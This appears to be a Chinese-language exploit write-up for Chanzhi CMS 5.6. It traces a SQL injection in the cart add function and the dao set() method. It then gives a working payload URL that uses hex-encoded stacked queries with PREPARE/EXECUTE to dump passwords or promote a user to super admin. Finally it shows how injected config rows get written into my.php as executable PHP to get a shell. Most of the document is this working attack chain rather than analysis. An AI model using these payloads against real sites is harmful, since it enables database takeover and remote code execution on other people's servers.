蝉知 5.6 getshell
前台注入
在/chanzhieps/system/module/cart/control.php页面的add函数
public function add($product, $count)
{
if($this->app->user->account == 'guest')
{
/* Save info to cookie if user is guest. */
$this->cart->addInCookie($product, $count);
$this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
}
else
{
$result = $this->cart->add($product, $count);
if($result) $this->send(array('result' => 'success', 'message' => $this->lang->saveSuccess));
$this->send(array('result' => 'fail', 'message' => dao::getError()));
}
}public function add($product, $count) $count是用户输入
我们看会员登录以后的,也就是$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php
public function add($productID, $count)
{
$hasProduct = $this->dao->select('count(id) as count')->from(TABLE_CART)->where('account')->eq($this->app->user->account)->andWhere('product')->eq($productID)->fetch('count');
if(!$hasProduct)
{
$product = new stdclass();
$product->product = $productID;
$product->account = $this->app->user->account;
$product->count = $count;
$this->dao->insert(TABLE_CART)->data($product)->exec();
}
else
{
$this->dao->update(TABLE_CART)->set("count= count + {$count}")->where('account')->eq($this->app->user->account)->andWhere('product')->eq($productID)->exec();
}
return !dao::isError();
}如果能查到产品的话,更新数量set(“count= count + {$count}”)
继续跟进set函数
/chanzhieps/system/lib/base/dao/dao.class.php
public function set($set)
{
/* Add ` to avoid keywords of mysql. */
if(strpos($set, '=') ===false)
{
$set = str_replace(',', '', $set);
$set = '`' . str_replace('`', '', $set) . '`';
}
$this->sql .= $this->isFirstSet ? " $set" : ", $set";
if($this->isFirstSet) $this->isFirstSet = false;
return $this;
}可以看到直接进入了$this->sql
成功延时
坑点来了:
在解析url的时候 有一句if(strpos($uri, ‘_’) !== false) $uri = substr($uri, 0, strpos($uri, ‘_’));
不能使用下划线,但是admin表的表名为eps_user
以我目前的知识储备,应该是无解的。
然后我注意到,这个cms用的是pdo的方式连接mysql。也就是说可以多语句执行
想起来前一天看ven师傅blog的时候学到的一个技巧。
set @a:=0x73656C6563742070617373776F72642066726F6D206570735F75736572206C696D697420313B
设置变量a,后面的值是select password from eps_user limit 1;的hex值
prepare s from @a; 准备一个查询语句
execute s;执行
当然,耶可以直接更新用户为super
http://127.0.0.1/chanzhieps/www/index.php/cart-add-1-1;set%20@b=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d2776656e273b;prepare%20x%20from%20@b;execute%20x;select%201%20union%20select%201
完美 至此,我们可以控制数据库任何数据。
后台getshell
后台getshell 一般是上传,写模板,写配置文件。
找到/system/module/upgrade/control.php
public function processSQL()
{
$this->upgrade->execute($this->post->fromVersion);fromVersion 是用户可控的数据
跟进execute /system/module/upgrade/model.php
public function fixDetectDeviceConfig()
{
$mobileTemplateConfigList = $this->dao->setAutoLang(false)->select('value, lang')->from(TABLE_CONFIG)
->where('`key`')->eq('mobileTemplate')
->fetchAll();
#var_dump($mobileTemplateConfigList);die();
if(!empty($mobileTemplateConfigList))
{
$myFile = $this->app->getConfigRoot() . 'my.php';
file_put_contents($myFile, "\n", FILE_APPEND);
foreach($mobileTemplateConfigList as $mobileTemplateConfig)
{
$fixedConfig = '$config->framework->detectDevice[' . "'{$mobileTemplateConfig->lang}'] = ";
$fixedConfig .= $mobileTemplateConfig->value == 'open' ? 'true' : 'false';
$fixedConfig .= ";\n";
file_put_contents($myFile, $fixedConfig, FILE_APPEND);
}
}
}
可控制数据库,所以$mobileTemplateConfig->lang可控 happy 写文件
insert into eps_config set id=1000,owner='system',module='common',section='site',key='mobileTemplate',lang='veneno'];phpinfo();//',value=1;
my.php
